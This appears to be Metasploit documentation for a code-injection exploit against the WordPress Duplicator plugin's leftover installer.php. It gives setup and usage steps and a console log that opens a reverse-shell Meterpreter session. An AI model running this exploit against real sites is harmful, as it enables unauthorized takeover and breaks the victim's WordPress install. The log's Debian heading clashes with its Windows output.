## Vulnerable Application

Duplicator by Snap Creek is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:
* An ZIP archive with the complete WordPress files and Duplicator specific files:
  * A copy of the `installer.php` script: `installer-backup.php`
  * A SQL script that will be used to restore the database content: `database.sql`
* An installer PHP script to restore the archive `installer.php`

When the `installer.php` completes its process, the following files remain in the directory and has to be manually deleted:
* The ZIP archive
* `database.sql` 
* `installer-backup.php`
* `installer-data.sql` 
* `installer-log.txt`
* `installer.php`

WARNING: exploiting the vulnerability will overwrite the wp-config.php file, breaking the WordPress instance.

Install a vulnerable version of [WordPress Duplicator (<= 1.2.40)](https://downloads.wordpress.org/plugin/duplicator.1.2.40.zip) and create a backup.
Put the `install.php` and archive files on a clean web server.

## Verification Steps

Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/php/wp_duplicator_code_inject`
3. Set the `RHOST`.
4. Confirm the target is vulnerable: `check`
5. Confirm that the target is vulnerable: `The target is vulnerable.`
6. Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp`
7. Set `LHOST` and `LPORT`
8. Run the exploit: `run`
9. Confirm you have now a meterpreter session

## Options

**TARGETURI**

The path to the installer.php file to exploit By default, the path is `/installer.php`.


## Scenarios

### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40

```
msf5 > use exploit/multi/php/wp_duplicator_code_inject
msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247
rhosts => 192.168.37.247
msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php
targeturi => /wordpress/installer.php
msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/php/wp_duplicator_code_inject) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Checking if the wp-config.php file already exists...
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
[*] Sending stage (38247 bytes) to 192.168.37.247
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.247:1251) at 2018-12-11 11:46:16 -0600
[*] Attempting to recreate wp-config file...
[*] Found archive name 20181127_test_site_126e49aaa44976fa5226181127215223_archive.zip
[*] Successfully created the wp-config.php file!

meterpreter > sysinfo
Computer    : WIN-0FAJA14JLP4
OS          : Windows NT WIN-0FAJA14JLP4 6.1 build 7601 (Windows 7 Enterprise Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >
```

